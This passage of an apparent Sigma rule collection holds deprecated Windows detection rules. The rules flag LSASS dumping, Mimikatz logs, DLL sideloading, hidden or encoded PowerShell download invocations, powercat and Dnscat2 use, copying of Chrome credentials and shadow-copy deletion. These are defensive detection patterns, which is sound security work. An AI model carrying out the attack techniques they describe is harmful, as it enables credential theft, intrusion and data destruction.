# list is incomplete
selection_procdump:
TargetFilename: 'C:\Windows\Temp\procdump.exe'
User|contains: # covers many language settings
- 'AUTHORI'
- 'AUTORI'
condition: 1 of selection*
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/file_event_win_hktl_createminidump.yml
================================================
title: CreateMiniDump Hacktool
id: db2110f3-479d-42a6-94fb-d35bc1e46492
status: deprecated
related:
- id: 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d
type: derived
description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine
author: Florian Roth (Nextron Systems)
references:
- https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass
date: 2019/12/22
modified: 2022/05/14
tags:
- attack.credential_access
- attack.t1003.001
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename|endswith: '\lsass.dmp'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/file_event_win_lsass_memory_dump_file_creation.yml
================================================
title: LSASS Memory Dump File Creation
id: 5e3d3601-0662-4af0-b1d2-36a05e90c40a
status: deprecated
description: LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified
references:
- https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
author: Teymur Kheirkhabarov, oscd.community
date: 2019/10/22
modified: 2023/08/29
tags:
- attack.credential_access
- attack.t1003.001
logsource:
category: file_event
product: windows
detection:
selection:
TargetFilename|contains: 'lsass'
TargetFilename|endswith: 'dmp'
condition: selection
fields:
- ComputerName
- TargetFilename
falsepositives:
- Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator
- Dumps of another process that contains lsass in its process name (substring)
level: high
================================================
FILE: deprecated/windows/file_event_win_mimikatz_memssp_log_file.yml
================================================
title: Mimikatz MemSSP Default Log File Creation
id: 034affe8-6170-11ec-844f-0f78aa0c4d66
related:
- id: 9e099d99-44c2-42b6-a6d8-54c3545cab29 # Replacement for this rule
type: similar
status: deprecated
description: Detects Mimikatz MemSSP default log file creation
references:
- https://pentestlab.blog/2019/10/21/persistence-security-support-provider/
author: David ANDRE
date: 2021/12/20
modified: 2023/02/16
tags:
- attack.credential_access
- attack.t1003
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename|endswith: 'mimilsa.log'
condition: selection
falsepositives:
- Unlikely
level: critical
================================================
FILE: deprecated/windows/file_event_win_office_outlook_rdp_file_creation.yml
================================================
title: .RDP File Created by Outlook Process
id: f748c45a-f8d3-4e6f-b617-fe176f695b8f
related:
- id: fccfb43e-09a7-4bd2-8b37-a5a7df33386d
type: derived
status: deprecated
description: |
Detects the creation of files with the ".rdp" extensions in the temporary directory that Outlook uses when opening attachments.
This can be used to detect spear-phishing campaigns that use RDP files as attachments.
references:
- https://thecyberexpress.com/rogue-rdp-files-used-in-ukraine-cyberattacks/
- https://www.microsoft.com/en-us/security/blog/2024/10/29/midnight-blizzard-conducts-large-scale-spear-phishing-campaign-using-rdp-files/
- https://www.linkedin.com/feed/update/urn:li:ugcPost:7257437202706493443?commentUrn=urn%3Ali%3Acomment%3A%28ugcPost%3A7257437202706493443%2C7257522819985543168%29&dashCommentUrn=urn%3Ali%3Afsd_comment%3A%287257522819985543168%2Curn%3Ali%3AugcPost%3A7257437202706493443%29
author: Florian Roth
date: 2024-11-01
modified: 2025-07-22
tags:
- attack.defense-evasion
logsource:
product: windows
category: file_event
detection:
selection_extension:
TargetFilename|endswith: '.rdp'
selection_location:
- TargetFilename|contains:
- '\AppData\Local\Packages\Microsoft.Outlook_' # New Outlook
- '\AppData\Local\Microsoft\Olk\Attachments\' # New Outlook
- TargetFilename|contains|all:
- '\AppData\Local\Microsoft\Windows\'
- '\Content.Outlook\'
condition: all of selection_*
falsepositives:
- Whenever someone receives an RDP file as an email attachment and decides to save or open it right from the attachments
level: high
================================================
FILE: deprecated/windows/file_event_win_susp_clr_logs.yml
================================================
title: Suspicious CLR Logs Creation
id: e4b63079-6198-405c-abd7-3fe8b0ce3263
status: deprecated
description: Detects suspicious .NET assembly executions. Could detect using Cobalt Strike's command execute-assembly.
references:
- https://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html
- https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/
- https://github.com/olafhartong/sysmon-modular/blob/5e5f6d90819a7f35eec0aba08021d0d201bb9055/11_file_create/include_dotnet.xml
author: omkar72, oscd.community, Wojciech Lesicki
date: 2020/10/12
modified: 2023/01/05
tags:
- attack.execution
- attack.defense_evasion
- attack.t1059.001
- attack.t1218
logsource:
category: file_event
product: windows
definition: Check your sysmon configuration for monitoring UsageLogs folder. In SwiftOnSecurity configuration we have that thanks @SBousseaden
detection:
selection:
TargetFilename|contains|all:
- '\AppData\Local\Microsoft\CLR'
- '\UsageLogs\'
TargetFilename|contains:
- 'mshta'
- 'cscript'
- 'wscript'
- 'regsvr32'
- 'wmic'
- 'rundll32'
- 'svchost'
condition: selection
falsepositives:
- Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675
level: high
================================================
FILE: deprecated/windows/image_load_alternate_powershell_hosts_moduleload.yml
================================================
title: Alternate PowerShell Hosts - Image
id: fe6e002f-f244-4278-9263-20e4b593827f
status: deprecated
description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe
references:
- https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2019/09/12
modified: 2023/06/01
tags:
- attack.execution
- attack.t1059.001
logsource:
product: windows
category: image_load
detection:
selection:
Description: 'System.Management.Automation'
ImageLoaded|contains: 'System.Management.Automation'
filter_generic:
- Image|endswith:
- '\powershell.exe'
- '\mscorsvw.exe'
- Image|startswith:
- 'C:\Program Files (x86)\Microsoft Visual Studio\'
- 'C:\Program Files\Microsoft Visual Studio\'
- 'C:\Windows\System32\'
- 'C:\Program Files\Citrix\ConfigSync\'
- Image: 'C:\Program Files\PowerShell\7\pwsh.exe'
filter_aurora:
# This filter is to avoid a race condition FP with this specific ETW provider in aurora
Image: null
condition: selection and not 1 of filter_*
falsepositives:
- Unknown
level: low
================================================
FILE: deprecated/windows/image_load_office_dsparse_dll_load.yml
================================================
title: Active Directory Parsing DLL Loaded Via Office Application
id: a2a3b925-7bb0-433b-b508-db9003263cc4
status: deprecated # In the AD Environment, dsparse.dll is loaded everytime an Office application is launched, so this rule is not useful.
description: Detects DSParse DLL being loaded by an Office Product
references:
- https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16
author: Antonlovesdnb
date: 2020-02-19
modified: 2025-10-17
tags:
- attack.execution
- attack.t1204.002
logsource:
category: image_load
product: windows
detection:
selection:
Image|endswith:
- '\excel.exe'
- '\mspub.exe'
- '\onenote.exe'
- '\onenoteim.exe' # Just in case
- '\outlook.exe'
- '\powerpnt.exe'
- '\winword.exe'
ImageLoaded|contains: '\dsparse.dll'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: deprecated/windows/image_load_office_kerberos_dll_load.yml
================================================
title: Active Directory Kerberos DLL Loaded Via Office Application
id: 7417e29e-c2e7-4cf6-a2e8-767228c64837
status: deprecated # In the AD Environment, kerberos.dll is loaded everytime an Office application is launched, so this rule is not useful.
description: Detects Kerberos DLL being loaded by an Office Product
references:
- https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16
author: Antonlovesdnb
date: 2020-02-19
modified: 2025-10-22
tags:
- attack.execution
- attack.t1204.002
logsource:
category: image_load
product: windows
detection:
selection:
Image|endswith:
- '\excel.exe'
- '\mspub.exe'
- '\onenote.exe'
- '\onenoteim.exe' # Just in case
- '\outlook.exe'
- '\powerpnt.exe'
- '\winword.exe'
ImageLoaded|endswith: '\kerberos.dll'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: deprecated/windows/image_load_side_load_advapi32.yml
================================================
title: Suspicious Load of Advapi31.dll
id: d813d662-785b-42ca-8b4a-f7457d78d5a9
status: deprecated
description: Detects the load of advapi31.dll by a process running in an uncommon folder
references:
- https://github.com/hlldz/Phant0m
author: frack113
date: 2022/02/03
modified: 2023/03/15
tags:
- attack.defense_evasion
- attack.t1070
logsource:
product: windows
category: image_load
detection:
selection:
ImageLoaded|endswith: '\advapi32.dll'
filter_common:
Image|startswith:
- 'C:\Windows\'
- 'C:\Program Files (x86)\'
- 'C:\Program Files\'
filter_defender:
Image|startswith: 'C:\ProgramData\Microsoft\Windows Defender\platform\'
Image|endswith: '\MpCmdRun.exe'
filter_onedrive:
Image|startswith: 'C:\Users\'
Image|contains: '\AppData\Local\Microsoft\OneDrive\'
Image|endswith: 'FileCoAuth.exe'
condition: selection and not 1 of filter_*
falsepositives:
- Unknown
level: informational
================================================
FILE: deprecated/windows/image_load_side_load_scm.yml
================================================
title: SCM DLL Sideload
id: bc3cc333-48b9-467a-9d1f-d44ee594ef48
related:
- id: 602a1f13-c640-4d73-b053-be9a2fa58b77
type: similar
status: deprecated
description: Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system
references:
- https://decoded.avast.io/martinchlumecky/png-steganography/
- https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022/12/01
modified: 2023/02/14
tags:
- attack.defense_evasion
- attack.persistence
- attack.privilege_escalation
- attack.t1574.001
logsource:
category: image_load
product: windows
detection:
selection:
ImageLoaded:
- 'C:\Windows\System32\WLBSCTRL.dll'
- 'C:\Windows\System32\TSMSISrv.dll'
- 'C:\Windows\System32\TSVIPSrv.dll'
Image: 'C:\Windows\System32\svchost.exe'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: deprecated/windows/image_load_side_load_svchost_dlls.yml
================================================
title: Svchost DLL Search Order Hijack
id: 602a1f13-c640-4d73-b053-be9a2fa58b77
status: deprecated
description: |
Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system
IKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\Windows\System32\ by default.
An attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services "svchost.exe -k netsvcs" to gain code execution on a remote machine.
references:
- https://decoded.avast.io/martinchlumecky/png-steganography/
- https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992
author: SBousseaden
date: 2019/10/28
modified: 2024/01/10
tags:
- attack.persistence
- attack.defense_evasion
- attack.t1574.001
logsource:
category: image_load
product: windows
detection:
selection:
Image|endswith: '\svchost.exe'
ImageLoaded|endswith:
- '\tsmsisrv.dll'
- '\tsvipsrv.dll'
- '\wlbsctrl.dll'
filter:
ImageLoaded|startswith: 'C:\Windows\WinSxS\'
condition: selection and not filter
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/image_load_susp_uncommon_image_load.yml
================================================
title: Possible Process Hollowing Image Loading
id: e32ce4f5-46c6-4c47-ba69-5de3c9193cd7
status: deprecated # Needs to be a correlation rule
description: Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz
references:
- https://web.archive.org/web/20220815065318/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html
author: Markus Neis
date: 2018/01/07
modified: 2024/01/22
tags:
- attack.defense_evasion
- attack.t1574.001
logsource:
category: image_load
product: windows
detection:
selection:
Image|endswith: '\notepad.exe'
ImageLoaded|endswith:
- '\samlib.dll'
- '\WinSCard.dll'
condition: selection
falsepositives:
- Very likely, needs more tuning
level: high
================================================
FILE: deprecated/windows/image_load_susp_winword_wmidll_load.yml
================================================
title: Windows Management Instrumentation DLL Loaded Via Microsoft Word
id: a457f232-7df9-491d-898f-b5aabd2cbe2f
status: deprecated
description: Detects DLL's Loaded Via Word Containing VBA Macros Executing WMI Commands
references:
- https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16
- https://www.carbonblack.com/2019/04/24/cb-tau-threat-intelligence-notification-emotet-utilizing-wmi-to-launch-powershell-encoded-code/
- https://media.cert.europa.eu/static/SecurityAdvisories/2019/CERT-EU-SA2019-021.pdf
author: Michael R. (@nahamike01)
date: 2019/12/26
modified: 2022/05/14
tags:
- attack.execution
- attack.t1047
logsource:
category: image_load
product: windows
detection:
selection:
Image|endswith:
- '\winword.exe'
- '\powerpnt.exe'
- '\excel.exe'
- '\outlook.exe'
ImageLoaded|endswith:
- '\wmiutils.dll'
- '\wbemcomn.dll'
- '\wbemprox.dll'
- '\wbemdisp.dll'
# - '\wbemsvc.dll' # too many FPs, tested with Win11 and O365
condition: selection
falsepositives:
- Possible. Requires further testing.
level: informational
================================================
FILE: deprecated/windows/net_connection_win_binary_github_com.yml
================================================
title: Microsoft Binary Github Communication
id: 635dbb88-67b3-4b41-9ea5-a3af2dd88153
status: deprecated
description: Detects an executable in the Windows folder accessing github.com
references:
- https://twitter.com/M_haggis/status/900741347035889665
- https://twitter.com/M_haggis/status/1032799638213066752
- https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1
author: Michael Haag (idea), Florian Roth (Nextron Systems)
date: 2017/08/24
modified: 2023/04/18
tags:
- attack.command_and_control
- attack.t1105
- attack.exfiltration
- attack.t1567.001
logsource:
category: network_connection
product: windows
detection:
selection:
Initiated: 'true'
DestinationHostname|endswith:
- '.github.com'
- '.githubusercontent.com'
Image|startswith: 'C:\Windows\'
condition: selection
falsepositives:
- Unknown
- '@subTee in your network'
level: high
================================================
FILE: deprecated/windows/net_connection_win_reddit_api_non_browser_access.yml
================================================
title: Suspicious Non-Browser Network Communication With Reddit API
id: d7b09985-95a3-44be-8450-b6eadf49833e
status: deprecated # In favour of 297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7
description: Detects an a non-browser process interacting with the Reddit API which could indicate use of a covert C2 such as RedditC2
references:
- https://github.com/kleiton0x00/RedditC2
- https://twitter.com/kleiton0x7e/status/1600567316810551296
- https://www.linkedin.com/posts/kleiton-kurti_github-kleiton0x00redditc2-abusing-reddit-activity-7009939662462984192-5DbI/?originalSubdomain=al
author: Gavin Knapp
date: 2023/02/16
modified: 2024/02/02
tags:
- attack.command_and_control
- attack.t1102
logsource:
product: windows
category: network_connection
detection:
selection:
DestinationHostname|contains: 'reddit.com' # Match with Reddit API when you can
# Other browsers or apps known to use reddit should be added
# TODO: Add full paths for default install locations
filter_optional_brave:
Image|endswith: '\brave.exe'
filter_optional_chrome:
Image:
- 'C:\Program Files\Google\Chrome\Application\chrome.exe'
- 'C:\Program Files (x86)\Google\Chrome\Application\chrome.exe'
filter_optional_firefox:
Image:
- 'C:\Program Files\Mozilla Firefox\firefox.exe'
- 'C:\Program Files (x86)\Mozilla Firefox\firefox.exe'
filter_optional_ie:
Image:
- 'C:\Program Files (x86)\Internet Explorer\iexplore.exe'
- 'C:\Program Files\Internet Explorer\iexplore.exe'
filter_optional_maxthon:
Image|endswith: '\maxthon.exe'
filter_optional_edge_1:
- Image|startswith: 'C:\Program Files (x86)\Microsoft\EdgeWebView\Application\'
- Image|endswith: '\WindowsApps\MicrosoftEdge.exe'
- Image:
- 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe'
- 'C:\Program Files\Microsoft\Edge\Application\msedge.exe'
filter_optional_edge_2:
Image|startswith:
- 'C:\Program Files (x86)\Microsoft\EdgeCore\'
- 'C:\Program Files\Microsoft\EdgeCore\'
Image|endswith:
- '\msedge.exe'
- '\msedgewebview2.exe'
filter_optional_opera:
Image|endswith: '\opera.exe'
filter_optional_safari:
Image|endswith: '\safari.exe'
filter_optional_seamonkey:
Image|endswith: '\seamonkey.exe'
filter_optional_vivaldi:
Image|endswith: '\vivaldi.exe'
filter_optional_whale:
Image|endswith: '\whale.exe'
condition: selection and not 1 of filter_optional_*
falsepositives:
- Legitimate applications communicating with the Reddit API e.g. web browsers not in the exclusion list, app with an RSS etc.
level: medium
================================================
FILE: deprecated/windows/net_connection_win_susp_epmap.yml
================================================
title: Suspicious Epmap Connection
id: 628d7a0b-7b84-4466-8552-e6138bc03b43
status: deprecated
description: Detects suspicious "epmap" connection to a remote computer via remote procedure call (RPC)
references:
- https://github.com/RiccardoAncarani/TaskShell/
author: frack113, Tim Shelton (fps)
date: 2022/07/14
modified: 2024/03/01
tags:
- attack.lateral_movement
logsource:
category: network_connection
product: windows
detection:
selection:
Protocol: tcp
Initiated: 'true'
DestinationPort: 135
# DestinationPortName: epmap
filter_image:
Image|startswith:
- C:\Windows\
- C:\ProgramData\Amazon\SSM\Update\amazon-ssm-agent-updater
filter_image_null1:
Image: null
filter_image_null2:
Image: ''
filter_image_unknown:
Image: ''
condition: selection and not 1 of filter_*
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/pipe_created_psexec_pipes_artifacts.yml
================================================
title: PsExec Pipes Artifacts
id: 9e77ed63-2ecf-4c7b-b09d-640834882028
status: deprecated
description: Detecting use PsExec via Pipe Creation/Access to pipes
references:
- https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view
author: Nikita Nazarov, oscd.community
date: 2020/05/10
modified: 2023/08/07
tags:
- attack.lateral_movement
- attack.t1021.002
- attack.execution
- attack.t1569.002
logsource:
product: windows
category: pipe_created
definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'
detection:
selection:
PipeName|startswith:
- 'psexec'
- 'paexec'
- 'remcom'
- 'csexec'
condition: selection
falsepositives:
- Legitimate Administrator activity
level: medium
================================================
FILE: deprecated/windows/posh_pm_powercat.yml
================================================
title: Netcat The Powershell Version - PowerShell Module
id: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2
status: deprecated
description: Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network
references:
- https://nmap.org/ncat/
- https://github.com/besimorhino/powercat
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md
author: frack113
date: 2021/07/21
modified: 2023/01/20
tags:
- attack.command_and_control
- attack.t1095
logsource:
product: windows
category: ps_module
definition: 'Requirements: PowerShell Module Logging must be enabled'
detection:
selection:
ContextInfo|contains:
- 'powercat '
- 'powercat.ps1'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: deprecated/windows/posh_ps_access_to_chrome_login_data.yml
================================================
title: Accessing Encrypted Credentials from Google Chrome Login Database
id: 98f4c75c-3089-44f3-b733-b327b9cd9c9d
status: deprecated
author: frack113
date: 2021/12/20
modified: 2022/05/14
description: |
Adversaries may acquire credentials from web browsers by reading files specific to the target browser.
Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.
Web browsers typically store the credentials in an encrypted format within a credential store.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md
logsource:
product: windows
category: ps_script
definition: Script block logging must be enabled
detection:
selection_cmd:
ScriptBlockText|contains|all:
- Copy-Item
- '-Destination'
selection_path:
ScriptBlockText|contains:
- '\Google\Chrome\User Data\Default\Login Data'
- '\Google\Chrome\User Data\Default\Login Data For Account'
condition: all of selection_*
falsepositives:
- Unknown
level: medium
tags:
- attack.credential_access
- attack.t1555.003
================================================
FILE: deprecated/windows/posh_ps_azurehound_commands.yml
================================================
title: AzureHound PowerShell Commands
id: 83083ac6-1816-4e76-97d7-59af9a9ae46e
status: deprecated
description: Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound
references:
- https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1
- https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html
author: Austin Songer (@austinsonger)
date: 2021/10/23
modified: 2023/01/02
tags:
- attack.discovery
- attack.t1482
- attack.t1087
- attack.t1087.001
- attack.t1087.002
- attack.t1069.001
- attack.t1069.002
- attack.t1069
logsource:
product: windows
category: ps_script
definition: Script Block Logging must be enabled
detection:
selection:
ScriptBlockText|contains: Invoke-AzureHound
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/posh_ps_cl_invocation_lolscript.yml
================================================
title: Execution via CL_Invocation.ps1 - Powershell
id: 4cd29327-685a-460e-9dac-c3ab96e549dc
status: deprecated
description: Detects Execution via SyncInvoke in CL_Invocation.ps1 module
references:
- https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/
- https://twitter.com/bohops/status/948061991012327424
author: oscd.community, Natalia Shornikova
date: 2020/10/14
modified: 2023/08/17
tags:
- attack.defense_evasion
- attack.t1216
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains|all:
- 'CL_Invocation.ps1'
- 'SyncInvoke'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/posh_ps_cl_mutexverifiers_lolscript.yml
================================================
title: Execution via CL_Mutexverifiers.ps1
id: 39776c99-1c7b-4ba0-b5aa-641525eee1a4
status: deprecated
description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module
references:
- https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/
- https://twitter.com/pabraeken/status/995111125447577600
author: oscd.community, Natalia Shornikova
date: 2020/10/14
modified: 2023/08/17
tags:
- attack.defense_evasion
- attack.t1216
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains|all:
- 'CL_Mutexverifiers.ps1'
- 'runAfterCancelProcess'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/posh_ps_dnscat_execution.yml
================================================
title: Dnscat Execution
id: a6d67db4-6220-436d-8afc-f3842fe05d43
status: deprecated # In favour of the more generic Susp and Malicious Cmdlet rules
description: Dnscat exfiltration tool execution
author: Daniil Yugoslavskiy, oscd.community
date: 2019/10/24
modified: 2024/01/25
tags:
- attack.exfiltration
- attack.t1048
- attack.execution
- attack.t1059.001
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains: 'Start-Dnscat2'
condition: selection
falsepositives:
- Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)
level: critical
================================================
FILE: deprecated/windows/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml
================================================
title: Suspicious PowerShell Mailbox SMTP Forward Rule
id: 15b7abbb-8b40-4d01-9ee2-b51994b1d474
status: deprecated
description: Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.
references:
- https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-26
modified: 2026-03-01
tags:
- attack.exfiltration
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains|all:
- 'Set-Mailbox '
- ' -DeliverToMailboxAndForward '
- ' -ForwardingSmtpAddress '
condition: selection
falsepositives:
- Legitimate usage of the cmdlet to forward emails
level: medium
================================================
FILE: deprecated/windows/posh_ps_file_and_directory_discovery.yml
================================================
title: Powershell File and Directory Discovery
id: d23f2ba5-9da0-4463-8908-8ee47f614bb9
status: deprecated
description: |
Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors,
including whether or not the adversary fully infects the target and/or attempts specific actions.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md
author: frack113
date: 2021/12/15
modified: 2023/12/11
tags:
- attack.discovery
- attack.t1083
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains:
- ls
- get-childitem
- gci
recurse:
ScriptBlockText|contains: '-recurse'
condition: selection and recurse
falsepositives:
- Unknown
level: low
================================================
FILE: deprecated/windows/posh_ps_invoke_nightmare.yml
================================================
title: PrintNightmare Powershell Exploitation
id: 6d3f1399-a81c-4409-aff3-1ecfe9330baf
status: deprecated
description: Detects Commandlet name for PrintNightmare exploitation.
references:
- https://github.com/calebstewart/CVE-2021-1675
author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
date: 2021/08/09
modified: 2023/01/02
tags:
- attack.privilege_escalation
- attack.t1548
logsource:
product: windows
category: ps_script
definition: Script Block Logging must be enabled
detection:
selection:
ScriptBlockText|contains: 'Invoke-Nightmare'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/posh_ps_susp_gwmi.yml
================================================
title: Suspicious Get-WmiObject
id: 0332a266-b584-47b4-933d-a00b103e1b37
status: deprecated
description: The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers
references:
- https://attack.mitre.org/datasources/DS0005/
- https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7
author: frack113
date: 2022/01/12
modified: 2023/12/11
tags:
- attack.persistence
- attack.t1546
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains:
- 'Get-WmiObject'
- 'gwmi'
filter_cl_utility:
Path|endswith: '\CL_Utility.ps1'
ScriptBlockText|contains|all:
- 'function Get-FreeSpace'
- 'SELECT * FROM Win32_LogicalDisk WHERE MediaType=12'
condition: selection and not 1 of filter_*
falsepositives:
- Legitimate PowerShell scripts
level: low
================================================
FILE: deprecated/windows/powershell_ps_susp_win32_shadowcopy.yml
================================================
title: Delete Volume Shadow Copies via WMI with PowerShell - PS Script
id: e17121b4-ef2a-4418-8a59-12fb1631fa9e
related:
- id: 21ff4ca9-f13a-41ad-b828-0077b2af2e40
type: similar
- id: c1337eb8-921a-4b59-855b-4ba188ddcc42
type: similar
status: deprecated
description: Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell
author: frack113
date: 2021-12-26
modified: 2025-05-20
tags:
- attack.impact
- attack.t1490
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains|all:
- 'Get-WmiObject'
- 'Win32_ShadowCopy'
- '.Delete()'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/powershell_suspicious_download.yml
================================================
title: Suspicious PowerShell Download
id: 65531a81-a694-4e31-ae04-f8ba5bc33759
status: deprecated
description: Detects suspicious PowerShell download command
tags:
- attack.execution
- attack.t1059.001
author: Florian Roth (Nextron Systems)
date: 2017/03/05
modified: 2022/04/11
logsource:
product: windows
service: powershell
detection:
webclient:
- 'System.Net.WebClient'
download:
- '.DownloadFile('
- '.DownloadString('
condition: webclient and download
falsepositives:
- PowerShell scripts that download content from the Internet
level: medium
================================================
FILE: deprecated/windows/powershell_suspicious_invocation_generic.yml
================================================
title: Suspicious PowerShell Invocations - Generic
id: 3d304fda-78aa-43ed-975c-d740798a49c1
status: deprecated
description: Detects suspicious PowerShell invocation command parameters
tags:
- attack.execution
- attack.t1059.001
author: Florian Roth (Nextron Systems)
date: 2017/03/12
modified: 2022/04/11
logsource:
product: windows
service: powershell
detection:
selection_encoded:
- ' -enc '
- ' -EncodedCommand '
selection_hidden:
- ' -w hidden '
- ' -window hidden '
- ' -windowstyle hidden '
selection_noninteractive:
- ' -noni '
- ' -noninteractive '
condition: all of selection*
falsepositives:
- Very special / sneaky PowerShell scripts
level: high
================================================
FILE: deprecated/windows/powershell_suspicious_invocation_specific.yml
================================================
title: Suspicious PowerShell Invocations - Specific
id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c
status: deprecated
description: Detects suspicious PowerShell invocation command parameters
tags:
- attack.execution
- attack.t1059.001
author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro
date: 2017/03/05
modified: 2023/05/04
logsource:
product: windows
service: powershell
definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103
detection:
selection_convert_b64:
'|all':
- '-nop'
- ' -w '
- 'hidden'
- ' -c '
- '[Convert]::FromBase64String'
selection_iex:
'|all':
- ' -w '
- 'hidden'
- '-noni'
- '-nop'
- ' -c '
- 'iex'
- 'New-Object'
selection_enc:
'|all':
- ' -w '
- 'hidden'
- '-ep'
- 'bypass'
- '-Enc'
selection_reg:
'|all':
- 'powershell'
- 'reg'
- 'add'
- 'HKCU\software\microsoft\windows\currentversion\run'
selection_webclient:
'|all':
- 'bypass'
- '-noprofile'
- '-windowstyle'
- 'hidden'
